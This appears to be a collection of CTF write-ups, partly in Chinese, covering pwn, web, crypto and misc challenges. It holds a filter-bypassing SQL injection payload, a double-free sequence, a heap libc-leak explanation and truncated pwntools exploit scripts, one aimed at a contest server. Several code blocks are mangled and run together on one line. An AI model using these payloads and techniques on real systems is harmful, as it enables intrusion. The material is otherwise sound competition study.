## [Pwn] Null - Cpt.shao

 /* Decompiler output: keep reading from fd 0 into the buffer at heap_ptr until
    at least `size` bytes have been accumulated in i. */
 for ( i = 0LL; ; i += v3 )
 {
   result = i;
   if ( i >= size )
     break;
   /* NOTE(review): every call requests the full `size` bytes at offset i, not
      the remaining `size - i`. After a short read (0 < v3 < size) the next call
      may write up to i bytes beyond heap_ptr + size. The allocation is not
      shown here; assuming it is exactly `size` bytes, that is a heap overflow.
      A bounded loop would pass `size - i` as the length. */
   v3 = read(0, (void *)(heap_ptr + i), size);
   if ( v3 <= 0 )
   {
     /* read() returned EOF or an error: print the 10-byte message, then call
        sub_400AD6(1) -- presumably an exit wrapper, confirm. */
     write(1, "I/O error\n", 0xAuLL);
     sub_400AD6(1u);
   }
 }

## [Misc] APFS - sherlly

猜想是对提取快照前后的文件修改时间进行异或来得到 flag，但是提取 9 位纳秒部分进行异或后，没有看到什么有价值的信息。

## [PPC] mathGame - CirQ

from pwn import *from hashlib import sha256from string import *from math import sqrtfrom itertools import pro

## [Web] 77777 2 - pyz

### 主要代码

数字 2 可以用 1+1 代替，如此类推；`pw)` 只要在中间加空格（写成 `pw )`）就可绕过过滤。

flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10))

## [Crypto] baby_N1ES - CirQ

def encrypt(self, plaintext):
    """Encrypt ``plaintext`` in independent 16-byte blocks and return the result.

    ``plaintext`` must be ``bytes`` with a length that is a multiple of 16;
    otherwise an ``Exception`` is raised. The message mentions only the
    length, but the same error is raised for a non-``bytes`` argument.
    """
    if (len(plaintext) % 16 != 0 or isinstance(plaintext, bytes) == False):
        raise Exception("plaintext must be a multiple of 16 in length")
    res = ''
    # NOTE(review): range() needs an int here and `res` starts as '' while the
    # halves are bytes, so this looks like Python 2 code -- confirm.
    # Each block is processed on its own: no IV and no chaining between blocks,
    # so equal plaintext blocks give equal ciphertext blocks.
    for i in range(len(plaintext) / 16):
        block = plaintext[i * 16:(i + 1) * 16]
        L = block[:8]
        R = block[8:]
        # 32 rounds. In each round the old R is carried over unchanged as the
        # new L, and the new R is round_add(old L, round key). Unlike a Feistel
        # round, the function output is never combined with the other half, so
        # the two 8-byte halves never influence each other.
        # round_add is defined outside this excerpt.
        for round_cnt in range(32):
            L, R = R, (round_add(L, self.Kn[round_cnt]))
        # Final swap of the halves before they are appended to the output.
        L, R = R, L
        res += L + R
    return res
# decrypt() is cut off in this excerpt; the visible part is kept as it appears.
def decrypt(self, ciphertext):
    if (len(ciphertext) % 16 != 0 or isinstance(ciphertext, bytes) == False):
        raise Exception("ciphertext must be a multiple of 16 in 

## [PWN]Beeper - Cpt.shao

heap1 = 0x57010heap2 = 0x57030case: '1' : --*heap2;case: 'L' : ++*heap2;case: 'N' : *heap2 = *heap1case: 'a' : --*heap1;case: 'h' : ++inputcase: 'm' : ++*inputcase: 'o' : --inputcase: 'r' : ++*heap1case: 'u' : --*inputcase: [] : input ? execute: skipcase: {} : heap2 ? execute: skip

# NOTE(review): remove() is defined outside this excerpt. Index 0 is passed twice,
# with index 2 in between; if remove() releases the entry, slot 0 is released a
# second time. The target should prevent that by clearing or validating the slot
# on the first release -- confirm against the binary.
remove(0);remove(2);remove(0)

## Run.py

from pwn import *LSHIFT = 'o' # --iRSHIFT = 'h' # ++iINC = 'm' # ++ (*i)DEC = 'u' # -- (*i)context.arch='amd64'password = '\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf' + '\x00'*85context.log_level = 'debug'# p = process('./beep

## [PWN]Vote - Cpt.shao

/* Record layout as reconstructed by the decompiler: three 8-byte fields,
   24 bytes in total. Field meanings are inferred from the names only. */
struct user{
  __int64 count;  /* presumably a counter for this entry -- confirm */
  __int64 time;   /* presumably a timestamp -- confirm */
  __int64 name;   /* NOTE(review): typed as a plain 64-bit integer; whether it is
                     a pointer or the start of inline name data is not visible here */
};

malloc一个unsortedbin大小的chunk然后free掉，通过show函数就能泄露一个libc地址。

## vote.py

from pwn import *import timeenv = {'LD_PRELOAD': './libc-2.23.so'}# p = process('./vote', env=env)p = remote('47.97.190.1', 6000)libc = ELF('./libc-2.23.so')context.log_level = 'debug'def create(size, name):    p.sendlineafter('Action: ', '0')    p.sendlineafter(': ', str(s